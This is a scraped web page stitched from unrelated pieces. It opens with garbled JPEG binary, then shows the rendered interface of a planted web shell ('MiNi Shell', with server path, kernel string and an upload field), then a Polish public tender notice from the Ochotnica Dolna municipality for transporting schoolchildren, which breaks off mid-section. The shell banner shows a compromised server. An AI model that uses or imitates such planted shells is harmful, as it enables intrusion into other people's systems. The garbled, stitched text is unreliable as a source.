JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210730/0013306801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00133068 z dnia 2021-07-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewozy dzieci z terenu gminy Ochotnica Dolna na zajęcia szkolne <br/>wraz z zapewnieniem opieki nad nimi w trakcie przewozów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ochotnica Dolna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892587</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dłubacze 160</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ochotnica Dolna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-452</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@ochotnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ochotnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewozy dzieci z terenu gminy Ochotnica Dolna na zajęcia szkolne <br/>wraz z zapewnieniem opieki nad nimi w trakcie przewozów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-842daded-f0a8-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00133068</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010810/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Przewozy dzieci z terenu gminy Ochotnica Dolna na zajęcia szkolne wraz z zapewnieniem opieki nad nimi w trakcie przewozów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.miniportal.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu:https://miniportal.uzp.gov.pl/, ePUAPu: https://epuap.gov.pl/wps/portal/ nazwa adresata:<br/>Urząd Gminy Ochotnica Dolna, Identyfikator adresata: /bw5m49no0s/skrytka oraz poczty<br/>elektronicznej:przetargi@ochotnica.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">12.3 Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>12.4 Oferty należy składać za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Szczegółowe informacje dotyczące sposobu składania ofert określone zostały w rozdziale XVI SWZ (opis sposobu przygotowania i złożenia oferty).<br/>12.5 Komunikacja pomiędzy Zamawiającym a wykonawcami, z wyjątkiem składania ofert, odbywa się za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do komunikacji wynosi 150 MB.<br/>12.6 Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej, na adres email: przetargi@ochotnica.pl<br/>12.7 We wszelkiej komunikacji związanej z niniejszym postępowaniem prowadzonej za pośrednictwem miniPortalu i ePUAP Zamawiający i wykonawcy posługują się numerem sprawy WZ.271.3.2.2021.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>24.1. Administratorem Państwa danych osobowych jest Gmina Ochotnica Dolna, os. Dłubacze 160, 34-452 Ochotnica Dolna.<br/>24.2. Gmina Ochotnica Dolna wyznaczyła Inspektora Ochrony Danych Osobowych Pana Wiesława Kowalskiego. Kontakt z Inspektorem możliwy jest przez e-mail: inspektor@cbi24.pl <br/>24.3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>24.4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18-19 ustawy. <br/>24.5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>24.6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy. <br/>24.7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/>24.8. Posiadają Państwo: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznacie Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO. <br/>24.9. Nie przysługuje Państwu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>24.10. Informacja o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 19 ust. 4 ustawy Zamawiający informuje o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy: <br/>− Zgodnie z art. 19 ust. 3 ustawy skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>− Na mocy art. 19 ust. 3 ustawy wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZ. 271.3.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia składa się z 4 oddzielnych zadań, tj.:<br/>Zadanie I<br/>część 1) przewozy uczniów uczęszczających do Szkoły Podstawowej im. Jana Pawła II w Ochotnicy Dolnej;<br/>część 2) przewozy uczniów uczęszczających do Szkoły Podstawowej im. ks. prof. Józefa Tischnera w Ochotnicy Dolnej - Skrodne;<br/>część 3) przewozy uczniów uczęszczających do Szkoły Podstawowej im. Marii Konopnickiej w Ochotnicy Górnej;<br/>Zadanie II - przewozy uczniów uczęszczających do Specjalnego Ośrodka Szkolno-Wychowawczego Nr 1 w Nowym Targu.<br/>Zadanie III - przewozy uczniów uczęszczających do Szkoły Podstawowej im. mjr H. Sucharskiego w Tylmanowej.<br/>Zadanie IV- przewozy uczniów uczęszczających do Niepublicznej Szkoły Podstawowej im. Bohaterów Krwawej Wigilii w Ochotnicy Dolnej - Młynne<br/>Wykonawca zapewni środki transportu wraz z kierowcami posiadającymi stosowne uprawnienia oraz osobami odpowiedzialnymi za opiekę nad dziećmi w trakcie przewozów - w zakresie niezbędnym do prawidłowej realizacji zamówienia.<br/>-Opieka nad przewożonymi dziećmi winna się odbywać przez osobę pełnoletnią, nie karaną za przestępstwo przeciwko dzieciom (zatrudniona na umowę o pracę)<br/>-Osoba sprawująca opiekę nie może być również chora na choroby zakaźne typu gruźlica, padaczka itp.<br/>-Obowiązków tych nie może pełnić osoba kierująca pojazdem.<br/>-Opieka musi być sprawowana podczas trwania każdego kursu, od momentu wejścia dzieci do pojazdu do momentu wejścia dziecka do szkoły, a w drodze powrotnej od momentu wyjścia ze szkoły do momentu odebrania dziecka przez opiekuna<br/><br/>Usługa dowozu dzieci musi odbywać się w pojazdach o dobrym stanie technicznym, które przystosowane są do przewozu dzieci szkolnych - zgodnie z obowiązującymi przepisami.<br/><br/>Na potrzeby niniejszej siwz przyjęto, że w okresie dowożenia, dzieci dowożone będą do szkół w czasie trwania zajęć szkolnych przez maksymalnie 190 dni w jednym roku szkolnym.<br/>Zamawiający zastrzega sobie możliwość rezygnacji z udzielenia części zamówienia.<br/><br/>Poniżej wyszczególniono ilość dzieci korzystających z przewozów w poszczególnych szkołach wraz z miejscem ich zamieszkania (ilości te mogą ulegać zmianie w okresie realizacji zamówienia), a także trasy przewozów oraz ich długość. W długościach tych nie uwzględniono tras dojazdów busów do miejsc rozpoczynanych tras i ich powrotów po odwiezieniu dzieci.<br/><br/>Zadanie I<br/>Część 1) <br/>Szkoła Podstawowa im. Jana Pawła II w Ochotnicy Dolnej:<br/>Orientacyjna godzina rozpoczynania zajęć: 745<br/><br/>Osiedle	Zakładana ilość dzieci korzystających z dowozu<br/>Ligasy i Bełk	6<br/>Brysiówka	4<br/>Janczury i Janczurowski Potok	6<br/>Osobie i Skalne	11<br/>Kamieniec i Sikorówka	9<br/>Zachry	6<br/>Rola	14<br/>RAZEM	58<br/><br/>Trasy przewozów:<br/>- Od osiedla Ligasy do budynku SP, drogą powiatową nr 1637K - długość trasy około 4,0 km w jedną stronę. W ramach tej trasy przewożone są dzieci z osiedli: Ligasy, Bełk, Brysiówka, Janczury, Janczurowski Potok, Kamieniec, Sikorówka, Zachry, Rola (44 dzieci).<br/><br/>Liczba kursów: rano- co najmniej 1 kurs<br/>po południu- co najmniej 2 kursy<br/><br/>- Od osiedla Osobie do budynku SP, drogą powiatową nr 1637K i drogą gminną w osiedlu Osobie - długość trasy około 6,0 km w jedną stronę. W ramach tej trasy przewożone są dzieci z osiedla Osobie i Skalne (11 dzieci).<br/>Uwaga: trasa ta może być realizowana wyłącznie busami o DMC poniżej 7,5t<br/><br/>Liczba kursów: rano- co najmniej 1 kurs<br/>po południu- co najmniej 1 kurs<br/><br/>UWAGA! Dzieci z os. Osobie dowożone będą przez cały rok szkolny, jednakże w okresie jesieni, zimy i wczesnej wiosny dowóz będzie zależny od panujących warunków pogodowych. Jeżeli warunki na drodze będą niesprzyjające- np. zalegający śnieg, duże opady śniegu, oblodzenie itp. decyzję o wjeździe na os. Osobie podejmie kierowca, mając na uwadze bezpieczeństwo dzieci. W przypadku, gdy transport nie będzie możliwy kierowca poinformuje Dyrektora szkoły, który z kolei przekaże informację rodzicom dzieci. W takiej sytuacji, dzieci z os. Osobie będą dowożone razem z dziećmi z trasy Ligasy- SP (w sumie 55 dzieci).<br/><br/><br/>Część 2)<br/>Szkoła Podstawowa im. ks. prof. Józefa Tischnera w Ochotnicy Dolnej - Skrodne:<br/>Orientacyjna godzina rozpoczynania zajęć: 750<br/><br/>Osiedle	Zakładana ilość dzieci korzystających z dowozu<br/>Gorcowe	35<br/>Gorcowe (Urbaniaki)	15<br/>Gorcowe (Górniki)	3<br/>RAZEM	53<br/><br/>Trasy przewozów:<br/>- Od osiedla Gorcowe Górniki do budynku SP, drogą powiatową nr 1637K i drogą gminną w osiedlu Gorcowe - długość trasy około 5,0 km w jedną stronę (53 dzieci).<br/>Uwaga: część tej trasy, tj. powyżej przysiółka Gorcowe-Urbaniaki może być realizowana wyłącznie busami o DMC poniżej 7,5t.<br/>Liczba kursów: rano co najmniej 1 kurs<br/> po południu co najmniej: 2 kursy <br/><br/>Część 3)<br/>Szkoła Podstawowej im. Marii Konopnickiej w Ochotnicy Górnej:<br/>Orientacyjna godzina rozpoczynania zajęć: 830<br/>Osiedle	Zakładana ilość dzieci korzystających z dowozu<br/>Furcówka, Przełącz Knurowska, Forendówki, Holina, Ustrzyk, Szpuntówka, Studzionki	41<br/>Białówka i Stasichy	12<br/>Jaszcze	6<br/>Gronie, Marciny, Sikory	15<br/>Jamne	25<br/><br/>RAZEM	99<br/><br/>Trasy przewozów:<br/>-Od osiedla Gronie do budynku szkoły, drogą powiatową nr 1637K - długość trasy około 3,0 km w jedną stronę. W ramach tej trasy przewożone są dzieci z osiedli: Marciny, Gronie i Sikory (15 dzieci).<br/><br/>Liczba kursów: rano- co najmniej 1 kurs<br/> po południu- co najmniej 1 kurs<br/><br/>-Od osiedla Ustrzyk (przy schronisku) do budynku szkoły, drogą powiatową nr 1637K- długość trasy około 4,5 km w jedną stronę. W ramach tej trasy przewożone są dzieci z osiedli: Furcówka, Przełącz Knurowska, Forendówki, Holina, Ustrzyk, Szpuntówka, Studzionki, Białówka, Stasichy (53 dzieci).<br/><br/>Liczba kursów: rano- co najmniej 1 kurs<br/> po południu- co najmniej 3 kursy<br/><br/>-Od osiedla Jamne (przy rozjeździe drogi Jamne z drogą na Skałkę) do budynku szkoły,drogą powiatową nr 1637K i drogą gminną w osiedlu Jamne - długość trasy około 4,5 km w jedną stronę. W ramach tej trasy przewożone są dzieci z osiedla Jamne (25 dzieci).<br/>Uwaga: trasa ta może być realizowana wyłącznie busami o DMC poniżej 7,5t.<br/><br/>Liczba kursów: rano- co najmniej 2 kursy<br/> po południu- co najmniej 2 kursy<br/><br/>-Od osiedla Jaszcze (przy rozwidleniu na Kosarzyskach) do budynku szkoły, drogą powiatową nr 1637K i drogą gminną w osiedlu Jaszcze - długość trasy około 3 km w jedną stronę). W ramach tej trasy przewożone są dzieci z osiedla Jaszcze (6 dzieci).<br/>Uwaga: trasa ta może być realizowana wyłącznie busami o DMC poniżej 7,5t.<br/><br/>Liczba kursów: rano- co najmniej 1 kurs<br/> po południu- co najmniej 1 kurs </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">19.4	Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+A<br/>P – ostateczna liczba punktów<br/>C- liczba punktów otrzymana za kryterium cena brutto<br/>A - liczba punktów otrzymanych za kryterium czas podstawienia autobusu/pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu/pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia składa się z 4 oddzielnych zadań, tj.:<br/>Zadanie I<br/>część 1) przewozy uczniów uczęszczających do Szkoły Podstawowej im. Jana Pawła II w Ochotnicy Dolnej;<br/>część 2) przewozy uczniów uczęszczających do Szkoły Podstawowej im. ks. prof. Józefa Tischnera w Ochotnicy Dolnej - Skrodne;<br/>część 3) przewozy uczniów uczęszczających do Szkoły Podstawowej im. Marii Konopnickiej w Ochotnicy Górnej;<br/>Zadanie II - przewozy uczniów uczęszczających do Specjalnego Ośrodka Szkolno-Wychowawczego Nr 1 w Nowym Targu.<br/>Zadanie III - przewozy uczniów uczęszczających do Szkoły Podstawowej im. mjr H. Sucharskiego w Tylmanowej.<br/>Zadanie IV- przewozy uczniów uczęszczających do Niepublicznej Szkoły Podstawowej im. Bohaterów Krwawej Wigilii w Ochotnicy Dolnej - Młynne<br/><br/>Wykonawca zapewni środki transportu wraz z kierowcami posiadającymi stosowne uprawnienia oraz osobami odpowiedzialnymi za opiekę nad dziećmi w trakcie przewozów - w zakresie niezbędnym do prawidłowej realizacji zamówienia.<br/>-Opieka nad przewożonymi dziećmi winna się odbywać przez osobę pełnoletnią, nie karaną za przestępstwo przeciwko dzieciom (zatrudniona na umowę o pracę)<br/>-Osoba sprawująca opiekę nie może być również chora na choroby zakaźne typu gruźlica, padaczka itp.<br/>-Obowiązków tych nie może pełnić osoba kierująca pojazdem.<br/>-Opieka musi być sprawowana podczas trwania każdego kursu, od momentu wejścia dzieci do pojazdu do momentu wejścia dziecka do szkoły, a w drodze powrotnej od momentu wyjścia ze szkoły do momentu odebrania dziecka przez opiekuna<br/><br/>Usługa dowozu dzieci musi odbywać się w pojazdach o dobrym stanie technicznym, które przystosowane są do przewozu dzieci szkolnych - zgodnie z obowiązującymi przepisami.<br/><br/>Na potrzeby niniejszej siwz przyjęto, że w okresie dowożenia, dzieci dowożone będą do szkół w czasie trwania zajęć szkolnych przez maksymalnie 190 dni w jednym roku szkolnym.<br/>Zamawiający zastrzega sobie możliwość rezygnacji z udzielenia części zamówienia.<br/><br/>Poniżej wyszczególniono ilość dzieci korzystających z przewozów w poszczególnych szkołach wraz z miejscem ich zamieszkania (ilości te mogą ulegać zmianie w okresie realizacji zamówienia), a także trasy przewozów oraz ich długość. W długościach tych nie uwzględniono tras dojazdów busów do miejsc rozpoczynanych tras i ich powrotów po odwiezieniu dzieci.<br/>Zadanie II<br/>Specjalny Ośrodek Szkolno-Wychowawczy 